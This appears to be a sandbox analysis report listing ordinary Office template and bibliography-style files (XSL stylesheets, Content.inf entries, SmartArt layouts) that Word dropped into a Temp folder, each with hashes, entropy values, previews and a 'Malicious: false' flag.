                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):286
                                                                                                                                                Entropy (8bit):3.5502940710609354
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:fxnxUXfQICl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyXClNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                MD5:9B8D7EFE8A69E41CDC2439C38FE59FAF
                                                                                                                                                SHA1:034D46BEC5E38E20E56DD905E2CA2F25AF947ED1
                                                                                                                                                SHA-256:70042F1285C3CD91DDE8D4A424A5948AE8F1551495D8AF4612D59709BEF69DF2
                                                                                                                                                SHA-512:E50BB0C68A33D35F04C75F05AD4598834FEC7279140B1BB0847FF39D749591B8F2A0C94DA4897AAF6C33C50C1D583A836B0376015851910A77604F8396C7EF3C
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .i.s.o.6.9.0...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD758F.tmp\iso690.xsl

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):270198
                                                                                                                                                Entropy (8bit):5.073814698282113
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:JwprAiaR95vtfb8pDbgWPzDCvCmvQursq7vImej/yQ4SS1apSiQhHDOruvoVeMUX:We
                                                                                                                                                MD5:FF0E07EFF1333CDF9FC2523D323DD654
                                                                                                                                                SHA1:77A1AE0DD8DBC3FEE65DD6266F31E2A564D088A4
                                                                                                                                                SHA-256:3F925E0CC1542F09DE1F99060899EAFB0042BB9682507C907173C392115A44B5
                                                                                                                                                SHA-512:B4615F995FAB87661C2DBE46625AA982215D7BDE27CAFAE221DCA76087FE76DA4B4A381943436FCAC1577CB3D260D0050B32B7B93E3EB07912494429F126BB3D
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD75BF.tmp\Content.inf

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):256
                                                                                                                                                Entropy (8bit):3.464918006641019
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:fxnxUXR+EqRGRnRE3QepmlJ0+3FbnKfZObdADxp1RDWlVwv:fxnyB+5RmRGHmD0wbnKYZAH+Vwv
                                                                                                                                                MD5:93149E194021B37162FD86684ED22401
                                                                                                                                                SHA1:1B31CAEBE1BBFA529092BE834D3B4AD315A6F8F1
                                                                                                                                                SHA-256:50BE99A154A6F632D49B04FCEE6BCA4D6B3B4B7C1377A31CE9FB45C462D697B2
                                                                                                                                                SHA-512:410A7295D470EC85015720B2B4AC592A472ED70A04103D200FA6874BEA6A423AF24766E98E5ACAA3A1DBC32C44E8790E25D4611CD6C0DBFFFE8219D53F33ACA7
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .E.q.u.a.t.i.o.n.s...d.o.t.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.W.D. .D.o.c.u.m.e.n.t. .P.a.r.t.s.}.........

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD75BF.tmp\Equations.dotx

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Word 2007+
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):51826
                                                                                                                                                Entropy (8bit):5.541375256745271
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:erH5dYPCA4t3aEFGiSUDtYfEbi5Ry/AT7/6tHODaFlDSomurYNfT4A0VIwWNS89u:Q6Cbh9tENyWdaFUSYNfZS89/3qtEu
                                                                                                                                                MD5:2AB22AC99ACFA8A82742E774323C0DBD
                                                                                                                                                SHA1:790F8B56DF79641E83A16E443A75A66E6AA2F244
                                                                                                                                                SHA-256:BC9D45D0419A08840093B0BF4DCF96264C02DFE5BD295CD9B53722E1DA02929D
                                                                                                                                                SHA-512:E5715C0ECF35CE250968BD6DE5744D28A9F57D20FD6866E2AF0B2D8C8F80FEDC741D48F554397D61C5E702DA896BD33EED92D778DBAC71E2E98DCFB0912DE07B
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK.........R.@c}LN4...........[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG.Cd.n.j.{/......V....c..^^.E.H?H.........B.........<...Ae.l.]..{....mK......B....

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD75C0.tmp\Content.inf

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):332
                                                                                                                                                Entropy (8bit):3.4871192480632223
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:fxnxUXsdDUaw93Ti8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyoRw9eNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                MD5:333BA58FCE326DEA1E4A9DE67475AA95
                                                                                                                                                SHA1:F51FAD5385DC08F7D3E11E1165A18F2E8A028C14
                                                                                                                                                SHA-256:66142D15C7325B98B199AB6EE6F35B7409DE64EBD5C0AB50412D18CBE6894097
                                                                                                                                                SHA-512:BFEE521A05B72515A8D4F7D13D8810846DC60F1E85C363FFEBD6CACD23AE8D2E664C563FC74700A4ED4E358F378508D25C46CB5BE1CF587E2E278EBC22BB2625
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .m.l.a.s.e.v.e.n.t.h.e.d.i.t.i.o.n.o.f.f.i.c.e.o.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD75C0.tmp\mlaseventheditionofficeonline.xsl

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):254875
                                                                                                                                                Entropy (8bit):5.003842588822783
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:MwprAnniNgtfbzbOWPuv7kOMBLitjAUjTQLrYHwR0TnyDkHqV3iPr1zHX5T6SSXj:a
                                                                                                                                                MD5:377B3E355414466F3E3861BCE1844976
                                                                                                                                                SHA1:0B639A3880ACA3FD90FA918197A669CC005E2BA4
                                                                                                                                                SHA-256:4AC5B26C5E66E122DE80243EF621CA3E1142F643DD2AD61B75FF41CFEE3DFFAF
                                                                                                                                                SHA-512:B050AD52A8161F96CBDC880DD1356186F381B57159F5010489B04528DB798DB955F0C530465AB3ECD5C653586508429D98336D6EB150436F1A53ABEE0697AEB9
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>...</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />......<xsl:variable name="prop_EndChars">.....<xsl:call-template name="templ_prop_EndChars"/>....</xsl:variable>......<xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parameters" />......

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD75D1.tmp\Content.inf

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):290
                                                                                                                                                Entropy (8bit):3.5081874837369886
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:fxnxUXCOzi8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnydONGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                MD5:8D9B02CC69FA40564E6C781A9CC9E626
                                                                                                                                                SHA1:352469A1ABB8DA1DC550D7E27924E552B0D39204
                                                                                                                                                SHA-256:1D4483830710EF4A2CC173C3514A9F4B0ACA6C44DB22729B7BE074D18C625BAE
                                                                                                                                                SHA-512:8B7DB2AB339DD8085104855F847C48970C2DD32ADB0B8EEA134A64C5CC7DE772615F85D057F4357703B65166C8CF0C06F4F6FD3E60FFC80DA3DD34B16D5B1281
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .g.o.s.t.n.a.m.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD75D1.tmp\gostname.xsl

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):255948
                                                                                                                                                Entropy (8bit):5.103631650117028
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:gwprAm795vtfb8p4bgWPWEtTmtcRCDPThNPFQwB+26RxlsIBkAgRMBHcTCwsHe5a:kW
                                                                                                                                                MD5:9888A214D362470A6189DEFF775BE139
                                                                                                                                                SHA1:32B552EB3C73CD7D0D9D924C96B27A86753E0F97
                                                                                                                                                SHA-256:C64ED5C2A323C00E84272AD3A701CAEBE1DCCEB67231978DE978042F09635FA7
                                                                                                                                                SHA-512:8A75FC2713003FA40B9730D29C786C76A796F30E6ACE12064468DD2BB4BF97EF26AC43FFE1158AB1DB06FF715D2E6CDE8EF3E8B7C49AA1341603CE122F311073
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>............<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select=

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD7611.tmp\Content.inf

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):314
                                                                                                                                                Entropy (8bit):3.5230842510951934
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:fxnxUXJuJaw93Ti8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyZuUw9eNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                MD5:F25AC64EC63FA98D9E37782E2E49D6E6
                                                                                                                                                SHA1:97DD9CFA4A22F5B87F2B53EFA37332A9EF218204
                                                                                                                                                SHA-256:834046A829D1EA836131B470884905856DBF2C3C136C98ADEEFA0F206F38F8AB
                                                                                                                                                SHA-512:A0387239CDE98BCDE1668B582B046619C3B3505F9440343DAD22B1B7B9E05F3B74F2AE29E591EC37B6570A0C0E5FE571442873594B0684DDCCB4F6A1B5E10B1F
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .i.e.e.e.2.0.0.6.o.f.f.i.c.e.o.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD7611.tmp\ieee2006officeonline.xsl

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):294178
                                                                                                                                                Entropy (8bit):4.977758311135714
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:ydkJ3yU0orh0SCLVXyMFsoiOjWIm4vW2uo4hfhf7v3uH4NYYP4BpBaZTTSSamEUD:b
                                                                                                                                                MD5:0C9731C90DD24ED5CA6AE283741078D0
                                                                                                                                                SHA1:BDD3D7E5B0DE9240805EA53EF2EB784A4A121064
                                                                                                                                                SHA-256:ABCE25D1EB3E70742EC278F35E4157EDB1D457A7F9D002AC658AAA6EA4E4DCDF
                                                                                                                                                SHA-512:A39E6201D6B34F37C686D9BD144DDD38AE212EDA26E3B81B06F1776891A90D84B65F2ABC5B8F546A7EFF3A62D35E432AF0254E2F5BFE4AA3E0CF9530D25949C0
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2006</xsl:text>.....</xsl:when>.. <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameL

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD7631.tmp\Content.inf

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):286
                                                                                                                                                Entropy (8bit):3.4670546921349774
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:fxnxUX0XPYDxUloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyEXPYDCloGHmD0+dAH/luWvv
                                                                                                                                                MD5:3D52060B74D7D448DC733FFE5B92CB52
                                                                                                                                                SHA1:3FBA3FFC315DB5B70BF6F05C4FF84B52A50FCCBC
                                                                                                                                                SHA-256:BB980559C6FC38B703D1E9C41720D5CE8D00D2FF86D4F25136DB02B1E54B1518
                                                                                                                                                SHA-512:952EF139A72562A528C1052F1942DAE1C0509D67654BF5E7C0602C87F90147E8EE9E251D2632BCB5B511AB2FF8A3734293D0A4E3DBD3D187F5E3C042685F9A0C
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.h.e.m.e.P.i.c.t.u.r.e.A.l.t.e.r.n.a.t.i.n.g.A.c.c.e.n.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD7631.tmp\ThemePictureAlternatingAccent.glox

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):5630
                                                                                                                                                Entropy (8bit):7.87271654296772
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:n5ni6jKZWsD+QJaUQ7R6qYFF5QS+BEgeJam6S7ZCHuKViGa2CnnLYLt/ht:nccqxIBdQ1QS+uDJanS7ZCHHVdJCnLY5
                                                                                                                                                MD5:2F8998AA9CF348F1D6DE16EAB2D92070
                                                                                                                                                SHA1:85B13499937B4A584BEA0BFE60475FD4C73391B6
                                                                                                                                                SHA-256:8A216D16DEC44E02B9AB9BBADF8A11F97210D8B73277B22562A502550658E580
                                                                                                                                                SHA-512:F10F7772985EDDA442B9558127F1959FF0A9909C7B7470E62D74948428BFFF7E278739209E8626AE5917FF728AFB8619AE137BEE2A6A4F40662122208A41ABB2
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK...........<..W8...j.......diagrams/layout1.xmlz........]......Hy..{...n .l.:.D.vvW..s....-a..fg&.}.\..+......4M..'=...(._.U]U......_.....U...k}.y.,......C..._^.......w/."7....v..Ea........Q..u..D{..{v.x.]....AtB15u..o...w..o.1...f.L...I<[zk7..7^..,.h.&l3...#..)..'H..d.r.#w=b...Ocw.y.&.v..t.>.s..m^M7..8I?o7................H...b....Qv.;'..%.f..#vR....V.H.),g..`...)(..m...[l...b...,.....U...Q.{.y.y.....G.I.tT.n..N.....A.tR..tr....i.<.......,.n:.#.A..a!X.......DK..;v..._M..lSc../n...v.....}.....I.|8.!b.C..v..|.....4l..n.;<9.i./..}!&2.c/.r...>.X02[..|.a.-.....$#-....>...{.M].>3.,\o.x....X%;.F.k.)*".I8<.0..#......?.h..-..O.2.B.s..v....{Abd...h0....H..I.. ...%...$1.Fyd..Y....U...S.Y.#.V.....TH(....%..nk.3Y.e.m.-.S..Q...j.Ai..E..v......4.t.|..&"...{..4.!.h.....C.P.....W...d[.....U<Yb;B.+W.!.@B....!.=......b"...Y.N;.#..Q...0G.lW...]7:...#9!z......|f..r..x.....t........`.uL1u.:.....U.D.n.<Q.[%...ngC./..|...!..q;;.w.".D..lt.".l.4".mt...E..mt

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD7632.tmp\Content.inf

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):258
                                                                                                                                                Entropy (8bit):3.4692172273306268
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:fxnxUXcq9DsoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnysmYoGHmD0+dAH/luWvv
                                                                                                                                                MD5:C1B36A0547FB75445957A619201143AC
                                                                                                                                                SHA1:CDB0A18152F57653F1A707D39F3D7FB504E244A7
                                                                                                                                                SHA-256:4DFF7D1CEF6DD85CC73E1554D705FA6586A1FBD10E4A73EEE44EAABA2D2FFED9
                                                                                                                                                SHA-512:0923FB41A6DB96C85B44186E861D34C26595E37F30A6F8E554BD3053B99F237D9AC893D47E8B1E9CF36556E86EFF5BE33C015CBBDD31269CDAA68D6947C47F3F
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .p.i.c.t.u.r.e.o.r.g.c.h.a.r.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD7632.tmp\pictureorgchart.glox

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):7370
                                                                                                                                                Entropy (8bit):7.9204386289679745
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:fYa+ngK2xG6HvLvoUnXxO+blKO1lt2Zg0AV:fYVn8Y6Hv3XxO+8uQZCV
                                                                                                                                                MD5:586CEBC1FAC6962F9E36388E5549FFE9
                                                                                                                                                SHA1:D1EF3BF2443AE75A78E9FDE8DD02C5B3E46F5F2E
                                                                                                                                                SHA-256:1595C0C027B12FE4C2B506B907C795D14813BBF64A2F3F6F5D71912D7E57BC40
                                                                                                                                                SHA-512:68DEAE9C59EA98BD597AE67A17F3029BC7EA2F801AC775CF7DECA292069061EA49C9DF5776CB5160B2C24576249DAF817FA463196A04189873CF16EFC4BEDC62
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK........;nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........HnB;..I)....j......._rels/.rels...J.@.._e..&6E.i/.,x..Lw'.j........G..\...................)...Y.3)..`...9r{v!......z...#>5.g.WJ%..T..>'m ..K.T.....j6[(:f.)S....C.mk5^.=:...X......C.... I......&5..e..H.1...).P.cw.kjT......C.......=.....}G!7E.y$.(...}b.........b=.<..^.....U..Y..PK.........^5a.2u............diagrams/layout1.xml..ko.8..+x.t.l..J.n.t.Mnw.x. ....B.t$.,.(&i.....(..d.mY......g.../[.<!.{ap>...L...p....G.9z?...._...e..`..%......8....G!..B8.....o...b.......Q.>|.......g..O\B...i.h...0B.}.....z...k...H..t~r.v........7o.E....$....Z.........ZDd..~......>......O.3.SI.Y.".O&I....#."._c.$.r..z.g0`...0...q:...^0.EF...%(.Ao$.#.o6..c'....$%.}

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD7643.tmp\Content.inf

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):288
                                                                                                                                                Entropy (8bit):3.523917709458511
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:fxnxUXC1l8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnySvNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                MD5:4A9A2E8DB82C90608C96008A5B6160EF
                                                                                                                                                SHA1:A49110814D9546B142C132EBB5B9D8A1EC23E2E6
                                                                                                                                                SHA-256:4FA948EEB075DFCB8DCA773A3F994560C69D275690953625731C4743CD5729F7
                                                                                                                                                SHA-512:320B9CC860FFBDB0FD2DB7DA7B7B129EEFF3FFB2E4E4820C3FBBFEA64735EB8CFE1F4BB5980302770C0F77FF575825F2D9A8BB59FC80AD4C198789B3D581963B
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .c.h.i.c.a.g.o...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD7643.tmp\chicago.xsl

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):296658
                                                                                                                                                Entropy (8bit):5.000002997029767
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:RwprAMk0qvtfL/vF/bkWPz9yv7EOMBPitjASjTQQr7IwR0TnyDkJb78plJwf33iV:M
                                                                                                                                                MD5:9AC6DE7B629A4A802A41F93DB2C49747
                                                                                                                                                SHA1:3D6E929AA1330C869D83F2BF8EBEBACD197FB367
                                                                                                                                                SHA-256:52984BC716569120D57C8E6A360376E9934F00CF31447F5892514DDCCF546293
                                                                                                                                                SHA-512:5736F14569E0341AFB5576C94B0A7F87E42499CEC5927AAC83BB5A1F77B279C00AEA86B5F341E4215076D800F085D831F34E4425AD9CFD52C7AE4282864B1E73
                                                                                                                                                Malicious:false
